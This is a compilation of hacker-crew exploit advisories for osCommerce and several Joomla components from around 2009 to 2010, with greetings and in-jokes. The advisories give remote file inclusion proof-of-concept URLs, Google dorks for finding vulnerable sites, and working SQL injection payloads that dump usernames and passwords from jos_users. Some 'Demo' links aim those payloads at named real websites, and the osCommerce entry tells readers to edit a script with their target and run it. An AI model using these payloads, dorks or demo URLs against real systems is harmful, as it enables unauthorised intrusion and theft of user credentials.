Oscommerce Online Merchant v2.2

Recode by arianom

[$] Exploit Title : Oscommerce Online Merchant v2.2 - Remote File Upload
[$] Date : 30-05-2010
[$] Author : MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : Remote File Upload
[$] Vendor : http://www.oscommerce.com
[$] Google Dork : n/a
[%] vulnerable file: /admin/file_manager.php
[$] Exploit: Download

Note:
Open and edit script,
Change http://kill-9.org with your website target.
Then upload to shell or hosting. Run it and Resolve to the Target.
Good Luck,,Bro

Greats : All Kill-9 Crew and IndonesianCoder Team , Malang-Cyber Crew and You

Mamboleto Joomla! component Remote File Include Vulneralbility

/**************************************************************************

[!] Mamboleto Joomla! component Remote File Include Vulneralbility
[!] Author : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage : http://www.indonesiancoder.com
[!] Date : December 10, 2009
[!] Tune In : http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] Novo Mamboleto 2.0 RC3 para Joomla! 1.5.x em “legacy mode”.
Muito mais aprimorado com dois bancos a mais (Sicredi e Bancoob) e com um novo módulo de integração com o VirtueMart.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down

===========================================================================

[ Vulnerable File ]

[+] mamboleto.php

Line 123

include_once( $mosConfig_absolute_path . ‘/administrator/components/com_mamboleto/include/pre.php’);

[ Proof of Concept ]

http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM – KILL-9 CREW – MainHack Brotherhood – ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends

[ rm -rf yourself ]

[>] FOR MALINGSIAL

[ some quotes ]

[+] Jack- says : why so serious ?
[+] Yadoy666 says : awas ada tukang =))
[+] arianom says : Kumpulkan Koin untuk Prita Mulyasari !!!
[+] Pathloader says : Oke lah kalau beg… beg… beg… begitu :D
[+] tiw0L says : Ojo di maem pleaseeeeee!!!
[+] kaMtiEz says : aku bukan HOMO <++++ Fitnah nih ga mau ngakuin :p

Joomla Component com_jphoto SQL injection vulnerability

#############################################################################################################
## Joomla Component com_jphoto SQL injection vulnerability - (id) ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : december 9, 2009 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.corephp.com/
[+] Download : http://www.corephp.com/component/option,com_rokdownloads/Itemid,100132/view,folder/ ( register first to download )
[+] About : http://www.corephp.com/jphoto/about.html
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_jphoto"
[+] LOCATION : INDONESIA - JOGJA
[+] price : -
#############################################################################################################
[ HERE WE GO ... LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_jphoto&view=category&id=[INDONESIANCODER]

[ Exploit ]

-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--

[ Demo ]

http://demo.davisservicesgroup.com/index.php?option=com_jphoto&view=category&id=-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--&Itemid=137

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!!

[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] selamat hari korupsi :D ..
[+] syalalala ...

[ EOF ]
[+] INDONESIANCODER TEAM
[+] KILL -9 TEAM

Joomla Component MojoBlog Multiple Remote File Include vulnerability

#########################################################################
## Joomla Component MojoBlog Multiple Remote File Include vulnerability #
## Author : kaMtiEz (kamzcrew@yahoo.com) #
## Homepage : http://www.indonesiancoder.com #
## Date : November 20, 2009 #
#########################################################################

[ Software Information ]

[+] Vendor : http://www.joomlify.com/
[+] Download : http://www.joomlify.com/files/mojoblog/
[+] version : RC0.15
[+] Vulnerability : RFI
[+] price : FREE
[+] Dork : inurl:"com_mojo"
[+] Location : INDONESIA - JOGJA

#########################################################################

[ Vulnerable File ]

http://127.0.0.1/components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]



http://127.0.0.1/components/com_mojo/wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]



[ BUG IN ]

[1] wp-comments-post.php



[2] wp-trackback.php


======================

[1] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');



[2] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');



[ FIX ]

contact me .. or aurakasih ..

Joke.. ;)
#########################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ]

[+] one day .. u will be mind ..
[+] bangun tidur coba mencari celah .. dapet juga ,, :D
[+] aurakasih .. aku butuh kamuwh .. hha
[+] om tukulesto kapan ke kotaku ?? hha

Joomla Component com_jsjobs Multiple SQL injection

#############################################################################################################
## Joomla Component com_jsjobs Multiple SQL injection vulnerability ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : december 9, 2009 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.joomshark.com/
[+] Download : http://www.joomsky.com/index.php?option=com_rokdownloads&view=file&task=download&id=23:js-jobs
[+] version : 1.0.5.6
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_jsjobs"
[+] LOCATION : INDONESIA - JOGJA
[+] Note : this extension have 2 categories .. free and commercial :D
[+] price : 20$
#############################################################################################################

[ HERE WE GO ... LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_company&vm=kaMz&md=[INDONESIANCODER]

http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=kaMtiEz&jobcat=Tukulesto&oi=[INDONESIANCODER]

[ Exploit ]

-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--

-666+union+select+666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,version(),666,666,666,666,666,666,666,666,666,6666+from+jos_users--

[ Demo ]

http://jsjobsdemo.joomshark.com/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_company&vm=kaMz&md=-666+union+all+select+666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--

http://www.vacaturezoektcv.nl/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=kaMtiEz&jobcat=Tukulesto&oi=-666+union+select+666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,version(),666,666,666,666,666,666,666,666,666,6666+from+jos_users--

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!!

[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] selamat hari korupsi :D ..
[+] Tukulesto : xpl terossssssssssss ...
[+] Gh4mb4S : sabar yach .. pasti ada hasil .. hahhaa
[+] dimanakah keadilan di tanah airku tercinta ??

[ EOF ]
[+] INDONESIANCODER TEAM
[+] KILL -9 TEAM